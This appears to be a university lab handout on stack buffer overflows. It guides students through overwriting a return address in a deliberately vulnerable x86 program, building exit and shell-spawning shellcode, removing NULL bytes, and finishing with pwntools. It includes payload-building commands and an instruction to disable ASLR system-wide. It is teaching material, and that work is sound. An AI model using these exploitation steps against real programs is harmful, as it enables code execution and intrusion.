We will use this lab archive throughout the lab.
Please download the lab archive an then unpack it using the commands below:
student@mjolnir:~$ wget http://elf.cs.pub.ro/oss/res/labs/lab-06.tar.gz student@mjolnir:~$ tar xzf lab-06.tar.gz
After unpacking we will get the lab-06/
folder that we will use for the lab:
student@mjolnir:~$ cd lab-06/ student@mjolnir:~/lab-06$ ls bin_to_hex.sh Makefile shellcode_exit.S skel_pwn.py test_shellcode.c vuln2.asm vuln.asm
Whenever an attacker manages to overwrite the return address, his primary follow-up is to divert the execution flow to his advantage. One can gain a stable foothold inside the exploited system via spawning a shell from the vulnerable application.
This can be accomplished by injecting code into the application's memory (stack, heap or by other means) and diverting the execution flow to that code. Please note the following prerequisites in order for this to work:
Since the injected code's outcome is commonly that of spawning a shell, the name “shellcode” is used to describe a wide array of such code snippets. A “shellcode” could also create a new socket, or read the contents of a file and print it to the standard output.
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
Note that this has a system-wide effect. To launch a single executable with ASLR disabled, use:
setarch $(uname -m) -R <executable>
(You can pass a shell as the executable and all processes launched by that shell will also have ASLR disabled.)
Let's write a simple shellcode which performs
exit(1337);
We have the following blatantly vulnerable program:
extern gets extern printf section .data formatstr: db "Enjoy your leak: %p",0xa,0 section .text global main main: push ebp mov ebp, esp sub esp, 64 lea ebx, [ebp - 64] push ebx push formatstr call printf push ebx call gets add esp, 4 leave ret
You may already see what the vulnerability consists of.
We are going to use some of PEDA's features to our advantage:
gdb-peda$ pattc 100 # Generate a De Bruijn pattern of length 100 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL' gdb-peda$ r Starting program: /vuln AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL Program received signal SIGSEGV, Segmentation fault. [----------------------------------registers-----------------------------------] EAX: 0xfff088f8 ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL") EBX: 0xfff088f8 ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL") ECX: 0xf77495a0 --> 0xfbad2288 EDX: 0xf774a87c --> 0x0 ESI: 0xf7749000 --> 0x1aedb0 EDI: 0xf7749000 --> 0x1aedb0 EBP: 0x41644141 ('AAdA') ESP: 0xfff08940 ("IAAeAA4AAJAAfAA5AAKAAgAA6AAL") EIP: 0x41413341 ('A3AA') EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] Invalid $PC address: 0x41413341 [------------------------------------stack-------------------------------------] 0000| 0xfff08940 ("IAAeAA4AAJAAfAA5AAKAAgAA6AAL") 0004| 0xfff08944 ("AA4AAJAAfAA5AAKAAgAA6AAL") 0008| 0xfff08948 ("AJAAfAA5AAKAAgAA6AAL") 0012| 0xfff0894c ("fAA5AAKAAgAA6AAL") 0016| 0xfff08950 ("AAKAAgAA6AAL") 0020| 0xfff08954 ("AgAA6AAL") 0024| 0xfff08958 ("6AAL") 0028| 0xfff0895c --> 0xf779ac00 --> 0x1 [------------------------------------------------------------------------------] Legend: code, data, rodata, value Stopped reason: SIGSEGV 0x41413341 in ?? () gdb-peda$ patto A3AA # Find offset within pattern A3AA found at offset: 68
Notice that the program crashed. We can quickly determine that the program tried to return to 0x41413341, which is in an unmapped region of memory, and thus triggered a fault. This value corresponds to the unique quad group “A3AA” found at offset 68 in the pattern. This offset is where the return address is situated relative to our input.
Now that we know the offset from the beginning of the buffer (and also, our input) as being 68, we can attempt to reliably crash the program to a destination of our choice. Let's try having 'BBBB' as our return address, or 0x42424242, preceded by 68 'A's.
We can construct this test sequence using python from the command line:
python -c "print 'A'*68 + 'BBBB'"
We can now rerun the binary under gdb and see what happens.
gdb-peda$ r Starting program: /vuln AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB Program received signal SIGSEGV, Segmentation fault. [----------------------------------registers-----------------------------------] EAX: 0xffb0e678 ('A' <repeats 68 times>, "BBBB") EBX: 0xffb0e678 ('A' <repeats 68 times>, "BBBB") ECX: 0xf77905a0 --> 0xfbad2288 EDX: 0xf779187c --> 0x0 ESI: 0xf7790000 --> 0x1aedb0 EDI: 0xf7790000 --> 0x1aedb0 EBP: 0x41414141 ('AAAA') ESP: 0xffb0e6c0 --> 0x0 EIP: 0x42424242 ('BBBB') EFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] Invalid $PC address: 0x42424242 [------------------------------------stack-------------------------------------] 0000| 0xffb0e6c0 --> 0x0 0004| 0xffb0e6c4 --> 0xffb0e754 --> 0xffb1018e ("/vuln") 0008| 0xffb0e6c8 --> 0xffb0e75c --> 0xffb101c0 ("LC_PAPER=ro_RO.UTF-8") 0012| 0xffb0e6cc --> 0x0 0016| 0xffb0e6d0 --> 0x0 0020| 0xffb0e6d4 --> 0x0 0024| 0xffb0e6d8 --> 0xf7790000 --> 0x1aedb0 0028| 0xffb0e6dc --> 0xf77e1c04 --> 0x0 [------------------------------------------------------------------------------] Legend: code, data, rodata, value Stopped reason: SIGSEGV 0x42424242 in ?? ()
Excellent!
Shellcode is typically written in assembly, due to memory constraints.
How do we start writing our exit shellcode? First, we need to know how system calls are performed on our target platform (x86 in our case).
Each system call has a specific number which identifies it. This number must be stored in EAX. Next, the arguments of the system call are placed in EBX, ECX, EDX, ESI, EDI, in this order. A special software interrupt is used to issue the actual system call, int 0x80.
Consult the Linux x32 ABI here
We need to place 1 (exit's system call number) in EAX, and the value of exit's single argument in EBX.
Our shellcode will look as follows:
BITS 32 mov eax, 1 mov ebx, 42 int 0x80
But we can't pass it as assembly instructions to the application; we need to assemble it into binary as well.
nasm shellcode_exit.S -o shell.bin
We now need this binary code as a stream of hex values in order to use python/perl/echo to feed it into the application.
hexdump -v -e '1/1 "\\"' -e '1/1 "x%02x"' shell.bin ; echo
or
xxd -c 1 -p shell.bin | awk '{ print "\\x" $0 }' | paste -sd ""
or just use the conveniently supplied bin_to_hex.sh script.
In order to test your shellcode, you can use xxd to export the shellcode as a C array and test it using the test_shellcode program in the archive.
xxd -i shell.bin > shellcode
By running test_shellcode under strace, you can check to see exactly if the system call was performed, and with which arguments. If all else fails, gdb.
strace -e exit ./test_shellcode strace: [ Process PID=5155 runs in 32 bit mode. ] exit(52) = ? +++ exited with 42 +++
Use the supplied bin_to_hex.sh script to convert a binary file to a hex representation. You can also do one final view of the shellcode using objdump:
objdump -D -b binary -M intel -m i386 shell.bin shell.bin: file format binary Disassembly of section .data: 00000000 <.data>: 0: b8 01 00 00 00 mov eax,0x1 5: bb 39 05 00 00 mov ebx,0x539 a: cd 80 int 0x80
First, let's determine the length of our shellcode:
python -c "print len('$(./bin_to_hex.sh shell.bin)')" 12
Next, we'll need to fill our buffer up to 68 characters until the saved return address is reached on the stack.
python -c "print '$(./bin_to_hex.sh shell.bin)' + 'A'*(68-12)"
Now we need to find the beginning of our buffer on the stack in order to return to it. Repeat the experiment and set a breakpoint at the leave instruction. Write down the address of the beginning of your buffer on the stack, cause that's where the shellcode will end up.
gdb-peda$ b *0x8048422 Breakpoint 1 at 0x8048422 gdb-peda$ r Starting program: /vuln AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL [----------------------------------registers-----------------------------------] EAX: 0xffffceb8 ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL") EBX: 0xffffceb8 ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL") ECX: 0xf7fac5a0 --> 0xfbad2288 EDX: 0xf7fad87c --> 0x0 ESI: 0xf7fac000 --> 0x1aedb0 EDI: 0xf7fac000 --> 0x1aedb0 EBP: 0xffffcef8 ("AAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL") ESP: 0xffffceb8 ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL") EIP: 0x8048422 (<main+18>: leave) EFLAGS: 0x286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x8048419 <main+9>: push ebx 0x804841a <main+10>: call 0x80482e0 <gets@plt> 0x804841f <main+15>: add esp,0x4 => 0x8048422 <main+18>: leave 0x8048423 <main+19>: ret 0x8048424 <main+20>: xchg ax,ax 0x8048426 <main+22>: xchg ax,ax 0x8048428 <main+24>: xchg ax,ax [------------------------------------stack-------------------------------------] 0000| 0xffffceb8 ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL") 0004| 0xffffcebc ("AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL") 0008| 0xffffcec0 ("ABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL") 0012| 0xffffcec4 ("$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL") 0016| 0xffffcec8 ("AACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL") 0020| 0xffffcecc ("A-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL") 0024| 0xffffced0 ("(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL") 0028| 0xffffced4 ("AA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL") [------------------------------------------------------------------------------] Legend: code, data, rodata, value Breakpoint 1, 0x08048422 in main ()
python -c "print '$(./bin_to_hex.sh shell.bin)' + 'A'*(68-12) + '\xb8\xce\xff\xff'" > payload
Now test the payload in gdb! Break at ret and see the control flow continuing on the stack and executing exit.
Then try running the experiment outside of gdb. Does it still work? Why or why not?
In order to circumvent frustration, we've leaked the stack address of the buffer in the binary.
Sometimes, you won't have access to the binary and only have a leaked address of some description. You can add this instruction in your shellcode
jmp 0x0
and vary the overwritten return address. If the program stops responding, then it means that it has reached your shellcode.
Stack addresses aren't always stable. To circumvent is, buffer space permitting, you can inject a large number of 'nop' instructions (no operation) prior to the actual shellcode. In this way, if you return to any of the injected nop instructions, the execution flow will reach your shellcode. To better illustrate:
Your exploit may spawn a shell, and yet it shuts off instantly. That's because the newly spawned shell isn't waiting on any input. A workaround to this problem is to append stdin to the payload, as follows:
cat payload - | ./vuln
In this way, after the shell spawns, you can interact with it.
Using the same vulnerable binary, write a shellcode which performs the following:
write(1, "Hello World!\n", 13);
Again, inspect the Linux x86 ABI.
jmp string start: pop ecx ; pop address of `hello` variable in ecx [...] string: call start ; jump/trampoline back to start while storing the address of `hello` on the stack hello: db "Hello World", 0
The call instruction will push the address of the next “instruction” (in this case, our string), onto the stack.
Now for the real challenge, write a shellcode which actually spawns a shell. The equivalent C call is the following:
execve('/bin/sh', ['/bin/sh'], 0);
Where ['/bin/sh'] denotes the address of the string '/bin/sh'.
Inspect the code of vuln2.asm. What changed? How is your input passed?
Some functions, such as strcpy, sprintf and strcat stop whenever a NULL byte is reached. If you inspect your previous shellcodes using xxd, you will notice that they have plenty of NULL ('0x00') bytes in them, so your lifelong dream for world domination will be cut short whenever these functions are used.
However, there's more than one way to skin a cat to write assembly. Convert your previous shellcode into one that contains no NULLs and use it to exploit vuln2.
mov <reg>, 0 <-> xor <reg>, <reg> mov <reg>, value <-> push value, pop <reg>
Lastly, let's use pwntools to do most of the work for us and exploit vuln once more. Fill in the values in skel_pwn.py and run the script.